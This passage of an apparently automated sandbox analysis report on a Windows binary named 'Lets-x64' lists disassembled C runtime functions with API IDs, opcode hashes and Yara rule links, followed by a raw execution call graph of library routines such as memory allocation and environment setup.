                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 517548149-0
                                                                                                                    • Opcode ID: fa985a46b7b6b7dcc0d461bbfdd9414ad58848c2d79c013f089396c8cb6bbb3d
                                                                                                                    • Instruction ID: d91d81bf83659a15ff6f51c0af310d6a58a6dfadc5df4bfef8a9dbe418a77904
                                                                                                                    • Opcode Fuzzy Hash: fa985a46b7b6b7dcc0d461bbfdd9414ad58848c2d79c013f089396c8cb6bbb3d
                                                                                                                    • Instruction Fuzzy Hash: 6F215172A59B81C6EBA19F31A50102A77B4FF88BC1B485039DA4F4BB58DF3CE450C70A
                                                                                                                    Function 00007FF668853578 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3106088686-0
                                                                                                                    • Opcode ID: 05f7958800d00bfde8268114ee56b592e211f2a19b1f485bd1a84abf12047c02
                                                                                                                    • Instruction ID: 229845faf1512139060dc0b5f9993bdd3334ee2bcc252498e2b705a30764d339
                                                                                                                    • Opcode Fuzzy Hash: 05f7958800d00bfde8268114ee56b592e211f2a19b1f485bd1a84abf12047c02
                                                                                                                    • Instruction Fuzzy Hash: 8B017130A1D743C2FB959B75A44503926B1AF48BA0B08423DC92FCA3C1EE3CE844C71A
                                                                                                                    Function 00007FF668856CF0 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 307345228-0
                                                                                                                    • Opcode ID: d313151686294f25f8f7d21e385e2467862330813931e0bf0385d1da5e86bfe5
                                                                                                                    • Instruction ID: 18ae6abddc66167db4bf00d8b69093dab4d98db8cf977bbe9e9eefd30787c07a
                                                                                                                    • Opcode Fuzzy Hash: d313151686294f25f8f7d21e385e2467862330813931e0bf0385d1da5e86bfe5
                                                                                                                    • Instruction Fuzzy Hash: CD41B632A09741C6EB90CF3598001A967E5FF44BA8F184639EE2E8BBD5DF3DE4018305
                                                                                                                    Function 00007FF668853884 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF6688538AD
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF6688538BD
                                                                                                                      • Part of subcall function 00007FF668855C10: _errno.LIBCMT ref: 00007FF668855C19
                                                                                                                      • Part of subcall function 00007FF668855C10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF668855C24
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF66885393B
                                                                                                                      • Part of subcall function 00007FF668854ED8: realloc.LIBCMT ref: 00007FF668854F03
                                                                                                                      • Part of subcall function 00007FF668854ED8: Sleep.KERNEL32(?,?,00000000,00007FF66885392B,?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF668854F1F
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF66885394B
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF668853999,?,?,?,?,00007FF668852322), ref: 00007FF668853958
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1909145217-0
                                                                                                                    • Opcode ID: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
                                                                                                                    • Instruction ID: 03360143bb99c00df0069902ed0cf30af0d4966680d625db9818c2a509a515c7
                                                                                                                    • Opcode Fuzzy Hash: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
                                                                                                                    • Instruction Fuzzy Hash: 4221B171B5A742C1EA819B31E90806AA371BF4ABD1F44483DDA4FDF354DE3CE985830A
                                                                                                                    Function 00007FF66885180C Relevance: 7.6, APIs: 5, Instructions: 67stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directorylstrlen$CreateCurrentlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 279805598-0
                                                                                                                    • Opcode ID: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
                                                                                                                    • Instruction ID: d1bc39b112cd224cb6eea60b4c6fde54c62f877f9b092d5f8806e0804540fcd9
                                                                                                                    • Opcode Fuzzy Hash: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
                                                                                                                    • Instruction Fuzzy Hash: 74218235B18B82C5F7B0CB36E49427A23B5EF49784F848139CA8E8AA55DE3CD5058705
                                                                                                                    Function 00007FF6688521AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                    • Opcode ID: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
                                                                                                                    • Instruction ID: 37209bf5189160bce845fbd209ab841d0cbcf1aa0240655c62bac3e6c68bcd35
                                                                                                                    • Opcode Fuzzy Hash: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
                                                                                                                    • Instruction Fuzzy Hash: 60E0EC30BA5702C2EF995B71A84413612B06F58740B48503EC91FCA394EF2CB989830A
                                                                                                                    Function 00007FF668852FF4 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 27599310-0
                                                                                                                    • Opcode ID: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
                                                                                                                    • Instruction ID: 39ad615607f997594a59c3d885b1eb9431280530804a348fc4eccf062fcf99c5
                                                                                                                    • Opcode Fuzzy Hash: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
                                                                                                                    • Instruction Fuzzy Hash: 1D516F32A4C742C2EAE59B75A84423A66B1EF86740F14453DE95FCB694CF3CED45830B
                                                                                                                    Function 00007FF668855644 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _amsg_exit$_getptd_lockfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148533958-0
                                                                                                                    • Opcode ID: 628d5342cbd1e67f1f3a3b6805dd6a854c1c623084b3b0db614e7cb17b0d6585
                                                                                                                    • Instruction ID: a975fd143a288cc283ff3a218d3687a6d3e985a136069b7d6195a48fee7bfff4
                                                                                                                    • Opcode Fuzzy Hash: 628d5342cbd1e67f1f3a3b6805dd6a854c1c623084b3b0db614e7cb17b0d6585
                                                                                                                    • Instruction Fuzzy Hash: E511EA36A19781C2EAD59B30E44077973B1EF48740F080039DA0F8B796CF2CF454CA0A
                                                                                                                    Function 00007FF668855350 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _amsg_exit_getptd$_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3670291111-0
                                                                                                                    • Opcode ID: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
                                                                                                                    • Instruction ID: e81f90cebff8d22734cf2e5560cd2ef7cff8506c154ba0aeace9b7e3bde63528
                                                                                                                    • Opcode Fuzzy Hash: 91f2677a30e6242cfe2f2c7e8f7ef960797a2fefed02ff18cb049ef4cbc26dd5
                                                                                                                    • Instruction Fuzzy Hash: A1F0F931A1A342C6FAD8AB7588427F82271AF59744F08123CDA0E8F3D2DF5CA840C71A

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:392
                                                                                                                    Total number of Limit Nodes:15
                                                                                                                    execution_graph 24715 18000c302 24716 180019380 24715->24716 24717 1800193c0 24716->24717 24721 1800108a0 24716->24721 24719 1800108a0 91 API calls 24717->24719 24720 1800193d7 24719->24720 24727 18001f238 24721->24727 24744 1800034f0 24721->24744 24722 1800108ce 24723 1800108e6 24722->24723 24765 18000a760 91 API calls 24722->24765 24723->24717 24728 18001f252 24727->24728 24729 18001f25c 24727->24729 24766 18002d3e0 24728->24766 24731 18001f261 24729->24731 24737 18001f268 malloc 24729->24737 24780 18001f30c 24731->24780 24733 18001f2b1 malloc 24786 18001e8e4 47 API calls __doserrno 24733->24786 24734 18001f26e HeapReAlloc 24735 18001f25a free 24734->24735 24734->24737 24735->24722 24736 18001f2ef 24788 18001e8e4 47 API calls __doserrno 24736->24788 24737->24733 24737->24734 24737->24736 24741 18001f2d6 24737->24741 24740 18001f2f4 GetLastError 24740->24735 24787 18001e8e4 47 API calls __doserrno 24741->24787 24743 18001f2db GetLastError 24743->24735 24745 18000350b 24744->24745 24746 1800034fc 24744->24746 24748 18001f252 24745->24748 24749 18001f25c 24745->24749 24747 18001f30c free 47 API calls 24746->24747 24750 180003504 24747->24750 24751 18002d3e0 malloc 47 API calls 24748->24751 24752 18001f261 24749->24752 24757 18001f268 malloc 24749->24757 24750->24722 24761 18001f25a free 24751->24761 24753 18001f30c free 47 API calls 24752->24753 24753->24761 24754 18001f2b1 malloc 24796 18001e8e4 47 API calls __doserrno 24754->24796 24755 18001f26e HeapReAlloc 24755->24757 24755->24761 24756 18001f2ef 24798 18001e8e4 47 API calls __doserrno 24756->24798 24757->24754 24757->24755 24757->24756 24762 18001f2d6 24757->24762 24760 18001f2f4 GetLastError 24760->24761 24761->24722 24797 18001e8e4 47 API calls __doserrno 24762->24797 24764 18001f2db GetLastError 24764->24761 24768 18002d474 malloc 24766->24768 24777 18002d3f8 malloc 24766->24777 24767 18002d430 HeapAlloc 24771 18002d469 24767->24771 24767->24777 24794 18001e8e4 47 API calls __doserrno 24768->24794 24771->24735 24772 18002d459 24792 18001e8e4 47 API calls __doserrno 24772->24792 24775 18002d45e 24793 18001e8e4 47 API calls __doserrno 24775->24793 24776 18002d410 24776->24767 24789 18002f37c 47 API calls 2 library calls 24776->24789 24790 18002f154 47 API calls 4 library calls 24776->24790 24791 18002082c GetModuleHandleW GetProcAddress ExitProcess malloc 24776->24791 24777->24767 24777->24772 24777->24775 24777->24776 24781 18001f311 RtlFreeHeap 24780->24781 24785 18001f341 free 24780->24785 24782 18001f32c 24781->24782 24781->24785 24795 18001e8e4 47 API calls __doserrno 24782->24795 24784 18001f331 GetLastError 24784->24785 24785->24735 24786->24735 24787->24743 24788->24740 24789->24776 24790->24776 24792->24775 24793->24771 24794->24771 24795->24784 24796->24761 24797->24764 24798->24760 24799 18001d697 24800 18001d6ab 24799->24800 24803 18000a7c0 24800->24803 24804 18000a7e1 24803->24804 24806 18000a450 91 API calls 24804->24806 24807 180029fb0 24809 180029fd6 24807->24809 24808 18002a013 24811 18002a055 24808->24811 24812 180029fde 24808->24812 24814 180029e74 128 API calls 24808->24814 24809->24808 24809->24812 24815 180029e74 24809->24815 24811->24812 24813 180029e74 128 API calls 24811->24813 24813->24812 24814->24811 24816 180029f01 24815->24816 24817 180029e82 24815->24817 24819 180029f3e 24816->24819 24825 180029f05 24816->24825 24857 18002d374 HeapCreate 24817->24857 24820 180029f43 _umatherr 24819->24820 24821 180029f99 24819->24821 24939 18002bfc8 24820->24939 24843 180029e8d 24821->24843 24945 18002c434 49 API calls 24821->24945 24825->24843 24937 18002cb20 48 API calls free 24825->24937 24828 180029e99 _RTC_Initialize 24831 180029e9d 24828->24831 24836 180029ea9 GetCommandLineA 24828->24836 24829 180029f32 24833 18002c178 50 API calls 24829->24833 24933 18002d3c0 HeapDestroy 24831->24933 24835 180029f37 24833->24835 24834 180029f63 FlsSetValue 24837 180029f79 24834->24837 24838 180029f8f 24834->24838 24938 18002d3c0 HeapDestroy 24835->24938 24876 180038d00 24836->24876 24944 18002c1a0 47 API calls 3 library calls 24837->24944 24839 18001f30c free 47 API calls 24838->24839 24839->24843 24843->24808 24845 180029f80 GetCurrentThreadId 24845->24843 24848 180029ecb 24914 18002c178 24848->24914 24852 180029eeb 24852->24843 24936 18002cb20 48 API calls free 24852->24936 24855 180029ee0 24855->24852 24935 1800208cc 58 API calls 2 library calls 24855->24935 24858 18002d398 HeapSetInformation 24857->24858 24859 180029e89 24857->24859 24858->24859 24859->24843 24860 18002c474 24859->24860 24946 180020b30 24860->24946 24862 18002c47f 24951 18002d0e4 24862->24951 24865 18002c4e8 24868 18002c178 50 API calls 24865->24868 24866 18002c488 FlsAlloc 24866->24865 24867 18002c4a0 24866->24867 24869 18002bfc8 __wtomb_environ 47 API calls 24867->24869 24870 18002c4ed 24868->24870 24871 18002c4af 24869->24871 24870->24828 24871->24865 24872 18002c4b7 FlsSetValue 24871->24872 24872->24865 24873 18002c4ca 24872->24873 24955 18002c1a0 47 API calls 3 library calls 24873->24955 24875 18002c4d4 GetCurrentThreadId 24875->24870 24877 180038d61 24876->24877 24878 180038d2f GetEnvironmentStringsW 24876->24878 24880 180038d3d 24877->24880 24881 180038e24 24877->24881 24879 180038d49 GetLastError 24878->24879 24878->24880 24879->24877 24883 180038d84 WideCharToMultiByte 24880->24883 24884 180038d6f GetEnvironmentStringsW 24880->24884 24882 180038e31 GetEnvironmentStrings 24881->24882 24885 180029ebb 24881->24885 24882->24885 24886 180038e43 24882->24886 24888 180038e13 24883->24888 24889 180038dd2 24883->24889 24884->24883 24884->24885 24901 18002c830 GetStartupInfoA 24885->24901 24890 18002bf5c _getbuf 47 API calls 24886->24890 24892 180038e16 FreeEnvironmentStringsW 24888->24892 24958 18002bf5c 24889->24958 24893 180038e67 24890->24893 24892->24885 24895 180038e6f FreeEnvironmentStringsA 24893->24895 24896 180038e7d __initmbctable 24893->24896 24895->24885 24899 180038e8b FreeEnvironmentStringsA 24896->24899 24897 180038de2 WideCharToMultiByte 24897->24892 24898 180038e0b 24897->24898 24900 18001f30c free 47 API calls 24898->24900 24899->24885 24900->24888 24902 18002bfc8 __wtomb_environ 47 API calls 24901->24902 24903 18002c86d 24902->24903 24905 18002ca33 24903->24905 24907 18002bfc8 __wtomb_environ 47 API calls 24903->24907 24912 180029ec7 24903->24912 24913 18002c99c 24903->24913 24904 18002ca59 GetStdHandle 24904->24905 24905->24904 24906 18002ca88 GetFileType 24905->24906 24908 18002cae8 SetHandleCount 24905->24908 24905->24912 24964 18002fd14 InitializeCriticalSectionAndSpinCount 24905->24964 24906->24905 24907->24903 24908->24912 24909 18002c9cf GetFileType 24909->24913 24912->24848 24922 180038c08 24912->24922 24913->24905 24913->24909 24913->24912 24963 18002fd14 InitializeCriticalSectionAndSpinCount 24913->24963 24915 18002c187 FlsFree 24914->24915 24919 18002c194 24914->24919 24915->24919 24916 18002d1a3 DeleteCriticalSection 24918 18001f30c free 47 API calls 24916->24918 24917 18002d1c1 24920 18002d1cf DeleteCriticalSection 24917->24920 24921 18002d1de 24917->24921 24918->24919 24919->24916 24919->24917 24920->24917 24921->24831 24923 180038c25 GetModuleFileNameA 24922->24923 24924 180038c20 24922->24924 24926 180038c57 24923->24926 24965 18002ea9c 24924->24965 24969 180038a38 47 API calls __setargv 24926->24969 24928 180038c7b 24929 180029ed7 24928->24929 24930 18002bf5c _getbuf 47 API calls 24928->24930 24929->24852 24934 180038908 85 API calls 4 library calls 24929->24934 24931 180038cab 24930->24931 24931->24929 24970 180038a38 47 API calls __setargv 24931->24970 24933->24843 24934->24855 24935->24852 24936->24848 24937->24829 24938->24843 24940 18002bfed 24939->24940 24942 180029f57 24940->24942 24943 18002c00b Sleep 24940->24943 25046 180039a9c 24940->25046 24942->24834 24942->24843 24943->24940 24943->24942 24944->24845 24945->24843 24956 18002c164 EncodePointer 24946->24956 24948 180020b3b _initp_misc_winsig 24949 18002f688 EncodePointer 24948->24949 24950 180020b7e EncodePointer 24949->24950 24950->24862 24952 18002d107 24951->24952 24954 18002c484 24952->24954 24957 18002fd14 InitializeCriticalSectionAndSpinCount 24952->24957 24954->24865 24954->24866 24955->24875 24957->24952 24959 18002bf78 24958->24959 24960 18002d3e0 malloc 46 API calls 24959->24960 24961 18002bfb0 24959->24961 24962 18002bf90 Sleep 24959->24962 24960->24959 24961->24888 24961->24897 24962->24959 24962->24961 24963->24913 24964->24905 24966 18002eaa9 24965->24966 24967 18002eab3 24965->24967 24971 18002e8a4 24966->24971 24967->24923 24969->24928 24970->24929 24995 18002c2d8 24971->24995 24978 18002bf5c _getbuf 47 API calls 24979 18002e8f4 __initmbctable 24978->24979 24989 18002ea51 24979->24989 25018 18002e62c 85 API calls 3 library calls 24979->25018 24981 18002e924 24982 18002ea53 24981->24982 24983 18002e92f 24981->24983 24984 18002ea6c 24982->24984 24985 18001f30c free 47 API calls 24982->24985 24982->24989 24987 18001f30c free 47 API calls 24983->24987 24988 18002e954 24983->24988 25020 18001e8e4 47 API calls __doserrno 24984->25020 24985->24984 24987->24988 24988->24989 25019 18002d2f4 47 API calls 2 library calls 24988->25019 24989->24967 25021 18002c254 GetLastError FlsGetValue 24995->25021 24997 18002c2e3 24998 18002c2f3 24997->24998 25033 1800207c0 47 API calls 2 library calls 24997->25033 25000 18002e4e0 24998->25000 25001 18002c2d8 _getptd 47 API calls 25000->25001 25002 18002e4ef 25001->25002 25005 18002e50a 25002->25005 25035 18002d2f4 47 API calls 2 library calls 25002->25035 25006 18002e58e 25005->25006 25036 1800207c0 47 API calls 2 library calls 25005->25036 25011 18002e59c 25006->25011 25037 18001f6b0 25011->25037 25014 18002e5e1 25016 18002e5e6 GetACP 25014->25016 25017 18002e5cc 25014->25017 25015 18002e5bc GetOEMCP 25015->25017 25016->25017 25017->24978 25017->24989 25018->24981 25020->24989 25022 18002c2c2 SetLastError 25021->25022 25023 18002c27a 25021->25023 25022->24997 25024 18002bfc8 __wtomb_environ 42 API calls 25023->25024 25025 18002c287 25024->25025 25025->25022 25026 18002c28f FlsSetValue 25025->25026 25027 18002c2a5 25026->25027 25028 18002c2bb 25026->25028 25034 18002c1a0 47 API calls 3 library calls 25027->25034 25030 18001f30c free 42 API calls 25028->25030 25032 18002c2c0 25030->25032 25031 18002c2ac GetCurrentThreadId 25031->25022 25032->25022 25034->25031 25038 18001f6c6 25037->25038 25039 18001f72a 25037->25039 25040 18002c2d8 _getptd 47 API calls 25038->25040 25039->25014 25039->25015 25041 18001f6cb 25040->25041 25042 18001f703 25041->25042 25045 180028974 47 API calls 4 library calls 25041->25045 25042->25039 25044 18002e4e0 __initmbctable 47 API calls 25042->25044 25044->25039 25045->25042 25047 180039ab1 25046->25047 25053 180039ae3 malloc 25046->25053 25048 180039abf 25047->25048 25047->25053 25055 18001e8e4 47 API calls __doserrno 25048->25055 25050 180039afb HeapAlloc 25052 180039adf 25050->25052 25050->25053 25051 180039ac4 25056 18002bcac 9 API calls 2 library calls 25051->25056 25052->24940 25053->25050 25053->25052 25055->25051 25056->25052 25057 180003470 25060 180002380 25057->25060 25061 1800023ab 25060->25061 25064 18000ad70 25061->25064 25069 18000ac70 25064->25069 25067 1800108a0 91 API calls 25068 1800023bb 25067->25068 25078 180009d60 25069->25078 25071 18000acbe 25072 18000ad46 25071->25072 25084 18000b6c0 91 API calls 25071->25084 25072->25067 25074 18000acd7 25085 180009cb0 91 API calls 25074->25085 25076 18000ace4 25076->25072 25086 180009f50 91 API calls 25076->25086 25079 180009da3 25078->25079 25080 180009ddd 25079->25080 25087 18000a5c0 25079->25087 25099 18000aa80 25079->25099 25080->25071 25081 180009dc1 25081->25071 25084->25074 25085->25076 25086->25072 25088 18000a5e8 25087->25088 25089 18000a600 25088->25089 25146 18000cd10 25088->25146 25121 180016210 25089->25121 25093 18000a639 25096 18000a66a 25093->25096 25151 18000b570 91 API calls 25093->25151 25094 18000a69c 25094->25081 25096->25094 25152 180009ec0 91 API calls 25096->25152 25100 18000aaaa 25099->25100 25101 18000aabb 25099->25101 25102 18000ab07 25100->25102 25103 18000aaac 25100->25103 25104 18000a7c0 91 API calls 25101->25104 25102->25101 25105 18000ab11 25102->25105 25197 180009850 91 API calls 25103->25197 25107 18000aac9 25104->25107 25198 18000a760 91 API calls 25105->25198 25112 18000aad8 25107->25112 25193 18001c840 25107->25193 25111 18000aaf7 25111->25081 25112->25111 25115 18000cd10 91 API calls 25112->25115 25115->25111 25153 180016b10 25121->25153 25125 180016268 25158 180013380 91 API calls 25125->25158 25127 18001627a 25159 18000ff40 105 API calls 25127->25159 25129 180016290 25136 1800162bd 25129->25136 25160 18000ea30 105 API calls _flush 25129->25160 25131 18001630d 25133 180016355 25131->25133 25134 180016325 25131->25134 25166 180013480 91 API calls 25133->25166 25163 18000e920 69 API calls 25134->25163 25136->25131 25161 180015f60 105 API calls 25136->25161 25162 18000ff40 105 API calls 25136->25162 25138 18001635f 25167 18001e0d0 8 API calls _wfreopen 25138->25167 25140 180016334 25164 1800120f0 91 API calls 25140->25164 25143 18000a626 25150 18000b4e0 91 API calls 25143->25150 25144 180016348 25165 18000ea30 105 API calls _flush 25144->25165 25147 18000cd50 25146->25147 25149 18000cd66 25147->25149 25178 18000ca90 25147->25178 25149->25089 25150->25093 25151->25093 25155 180016b45 25153->25155 25156 180016255 25155->25156 25168 180016a30 25155->25168 25157 18000ec00 91 API calls 25156->25157 25157->25125 25158->25127 25159->25129 25160->25136 25161->25136 25162->25136 25163->25140 25164->25144 25165->25133 25166->25138 25167->25143 25169 180016a65 25168->25169 25170 180016a60 25168->25170 25172 1800108a0 91 API calls 25169->25172 25176 180010880 91 API calls 25170->25176 25173 180016a76 __initmbctable 25172->25173 25174 180016ae7 25173->25174 25177 180016940 91 API calls _fread_nolock 25173->25177 25174->25156 25176->25169 25177->25174 25179 18000cd02 25178->25179 25180 18000caaa 